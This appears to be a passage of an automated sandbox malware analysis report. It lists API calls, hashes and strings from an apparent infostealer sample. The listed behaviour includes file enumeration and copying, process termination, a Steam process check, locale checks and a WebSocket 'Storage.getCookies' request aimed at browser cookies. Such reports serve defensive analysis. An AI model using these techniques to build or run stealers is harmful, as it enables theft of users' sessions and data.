                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 3bc41afe60208ccf3695fee588f4617c0089e66223b6028e7d6d9084138d0a7b
                        • Instruction ID: cb58ec0e3c5e8d0175cb0d4e02884ccb7a294ab3d8b4d5a161ddc920c2d5d31a
                        • Opcode Fuzzy Hash: 3bc41afe60208ccf3695fee588f4617c0089e66223b6028e7d6d9084138d0a7b
                        • Instruction Fuzzy Hash: 768184719102189BDB24EF75DD49AEF77B9BF44300F40459AF90993251EB38AA88CFA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004416E2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044176C
                        • lstrcat.KERNEL32(00000000), ref: 00441776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 004418F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004418FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 5d16349fe3eb1badf03cc8e82b46e19dffc0818f7e2ef66a0a9cb1707989a027
                        • Instruction ID: c686e7154f042172a3be8a34f3715c5f671fbe4c640f845eea51a9d1634791a1
                        • Opcode Fuzzy Hash: 5d16349fe3eb1badf03cc8e82b46e19dffc0818f7e2ef66a0a9cb1707989a027
                        • Instruction Fuzzy Hash: 3A81A870A102069BEB21EF65DD85AAFB7F5AF04304F44112AF805A7361DB78DC81CBA9
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0045DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0045DD4C
                        • wsprintfA.USER32 ref: 0045DD62
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045DD79
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045DD9C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045DDB6
                        • wsprintfA.USER32 ref: 0045DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0045DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045DDED
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                          • Part of subcall function 0045D980: memset.MSVCRT ref: 0045D9A1
                          • Part of subcall function 0045D980: memset.MSVCRT ref: 0045D9B3
                          • Part of subcall function 0045D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045D9DB
                          • Part of subcall function 0045D980: lstrcpy.KERNEL32(00000000,?), ref: 0045DA0E
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,00000000), ref: 0045DA1C
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,0158E508), ref: 0045DA36
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,?), ref: 0045DA4A
                          • Part of subcall function 0045D980: lstrcat.KERNEL32(?,0158D460), ref: 0045DA5E
                          • Part of subcall function 0045D980: lstrcpy.KERNEL32(00000000,?), ref: 0045DA8E
                          • Part of subcall function 0045D980: GetFileAttributesA.KERNEL32(00000000), ref: 0045DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045DE2E
                        • FindClose.KERNEL32(00000000), ref: 0045DE3D
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045DE66
                        • lstrcat.KERNEL32(?,0158D770), ref: 0045DE7A
                        • lstrlen.KERNEL32(?), ref: 0045DE84
                        • lstrlen.KERNEL32(?), ref: 0045DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: 4db847732f49da87cd59d31d58af156466ae1106088fce5ec006a3ca2222a8b0
                        • Instruction ID: 6429448106359c8cd427c7cf6e7660867a84156a8a4a62a644bab963b775a228
                        • Opcode Fuzzy Hash: 4db847732f49da87cd59d31d58af156466ae1106088fce5ec006a3ca2222a8b0
                        • Instruction Fuzzy Hash: D8618571910208AFCB24EF74DD49ADE77B9BF48305F4045A9F909A7251DB389E84CF64
                        APIs
                        • wsprintfA.USER32 ref: 0045D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045D564
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045D584
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045D59E
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045D5E3
                        • lstrcat.KERNEL32(?,0158EAC8), ref: 0045D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0045D60B
                        • lstrcat.KERNEL32(?,?), ref: 0045D61C
                        • lstrcat.KERNEL32(?,00471794), ref: 0045D62E
                        • lstrcat.KERNEL32(?,?), ref: 0045D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045D737
                        • FindClose.KERNEL32(00000000), ref: 0045D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 025037dca0598d915d2c46cfddcd54881c39678cbbf8d3856a48e9b76eecc7e5
                        • Instruction ID: 3668b14af6b003abf29ccf82cd466c2a177c03c4a196d97a274a714c52217588
                        • Opcode Fuzzy Hash: 025037dca0598d915d2c46cfddcd54881c39678cbbf8d3856a48e9b76eecc7e5
                        • Instruction Fuzzy Hash: F56195719101199BDB24EF74DC88ADEB7B5AF48305F0084A9F909A3351DB38AA84CFA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: 49dd3b3ea9483b2732a2beeac070febc720aad5a06edde20691539b4b15b4db1
                        • Instruction ID: dd65c41c464298faf40e24bf2483483b37b49f67cbc5c7275401145b0dacf75e
                        • Opcode Fuzzy Hash: 49dd3b3ea9483b2732a2beeac070febc720aad5a06edde20691539b4b15b4db1
                        • Instruction Fuzzy Hash: 24A26970D012599FDF20DFA8C9807EDBBB6AF89304F1481AAD508A7341EB785E85CF95
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004523D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004523F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452402
                        • lstrlen.KERNEL32(\*.*), ref: 0045240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00452436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00452486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 07dc86d98fef2fd3f0d2c516709103f943e1cd855afde971bd245e2c2c44122d
                        • Instruction ID: 31b1713678d08ae30cccdf4526df538c45655d3c80e7c5e73fa6413df4cc0e8b
                        • Opcode Fuzzy Hash: 07dc86d98fef2fd3f0d2c516709103f943e1cd855afde971bd245e2c2c44122d
                        • Instruction Fuzzy Hash: 4E4195317102059BDB31FF25DE85A9FB7A5AF15309F40512BFC49A7322CBB89C458BA8
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004646B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 004646C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 004646DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 004646ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00464711
                        • CloseHandle.KERNEL32(00000000), ref: 00464718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00464726
                        • CloseHandle.KERNEL32(00000000), ref: 00464731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 6d7f1dcb1fdd15ad271bf1bf391bad682eb88258839640b9ae873c0083e976da
                        • Instruction ID: 1615484cd67d504cb4dfce18e5696c8c0572e381410346406eecbeaf6a369e0a
                        • Opcode Fuzzy Hash: 6d7f1dcb1fdd15ad271bf1bf391bad682eb88258839640b9ae873c0083e976da
                        • Instruction Fuzzy Hash: 1B01A131611114ABEB255B60DC8CFFB37BDAB85B51F041199F90992180EF789D808A75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (+}z$JHk$QhL$\`w$k_{.$rbXk$sEG{$|?]$A;
                        • API String ID: 0-1580587299
                        • Opcode ID: 2984d76719618c611581c2d92288a986b85d038fadab823062c60397515671b1
                        • Instruction ID: aede0d9fae2de8e3d5d2726e0eb417b2e356877e8954e2dd0b33f8ed13b6d016
                        • Opcode Fuzzy Hash: 2984d76719618c611581c2d92288a986b85d038fadab823062c60397515671b1
                        • Instruction Fuzzy Hash: BBB218F3A0C2009FE308AE2DDC8567AFBE9EF94720F1A453DE6C587744EA3558058697
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00464628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00464638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0046464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00464660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00464672
                        • CloseHandle.KERNEL32(00000000), ref: 0046467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: 33ce8ef03c1ed421144a58ac81df9ce6d3dd98b0ec6bf43b9812f1574947763d
                        • Instruction ID: 56d5960c80cd642f8c71b975199415d95c4f03a6124c0ca172135ef0533ea0be
                        • Opcode Fuzzy Hash: 33ce8ef03c1ed421144a58ac81df9ce6d3dd98b0ec6bf43b9812f1574947763d
                        • Instruction Fuzzy Hash: B6018F716011249BDB209B70EC48FEB77ADEB49350F0001DAE90DD2140EBB889948AE5
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454B7F
                        • lstrlen.KERNEL32(00474CA8), ref: 00454B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BA7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 00454BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00454BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: 976922cba01cb0031d9c5a27596fc65e0bc36f4382cc3c11fb9f2a0cec565086
                        • Instruction ID: 2fc248bcc17de3ff8d4b9e52b3aab27a06e8a9d32546598f83a6a75f55e77978
                        • Opcode Fuzzy Hash: 976922cba01cb0031d9c5a27596fc65e0bc36f4382cc3c11fb9f2a0cec565086
                        • Instruction Fuzzy Hash: 003197312111059BD722EF25DD85A9FB7B5AF80319F40112AFC099B352CB78ED458BA8
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00462D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00462DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00462DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00462DEC
                        • LocalFree.KERNEL32(00000000), ref: 00462FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: f9c2ad78fdabe956875cc1bd1714371f88f2bf18e0c866eea6ef69fc720493c5
                        • Instruction ID: e9f746b1d6cfd464eb95bec35ad2d2ddf7e659aeb66acf9e2e78ec32d7aafda5
                        • Opcode Fuzzy Hash: f9c2ad78fdabe956875cc1bd1714371f88f2bf18e0c866eea6ef69fc720493c5
                        • Instruction Fuzzy Hash: 1BB12E70900615DFC718CF14CA48B96B7F2FB44329F29C1AAD4085B3A5E7BA9D82CF95
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Brw$Q.[b$XE$i k$jt=$u3y$z6~+
                        • API String ID: 0-3060621466
                        • Opcode ID: 90fca21d0a5872a54e7ea86d9a200738930da4cd07003a391d0794b3e5d6b14e
                        • Instruction ID: 9a9dc94020a315361a3efe95964128cf0c10be4e32a3bf67494b1d1f7535af8c
                        • Opcode Fuzzy Hash: 90fca21d0a5872a54e7ea86d9a200738930da4cd07003a391d0794b3e5d6b14e
                        • Instruction Fuzzy Hash: 65B239F3A0C6009FE308AE2DEC8567AFBEAEFD4620F1A853DE5C5C3744E93558058656
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5O_$1{$;d;$V\^$Z:~?$bp5~$v=7
                        • API String ID: 0-4034966862
                        • Opcode ID: b6b9050ec3a89621ad13c03419e01f4b192e7c7c4498d033588ce37d97cdf242
                        • Instruction ID: 413107da9ea36e7b63cec75ec54f714d4d1fc0f5d40aa76b34f70f5fd9abf351
                        • Opcode Fuzzy Hash: b6b9050ec3a89621ad13c03419e01f4b192e7c7c4498d033588ce37d97cdf242
                        • Instruction Fuzzy Hash: 3262E8F3A082049FE304AF29EC8167AF7E9EF94720F16893DEAC4C7744E63558158697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
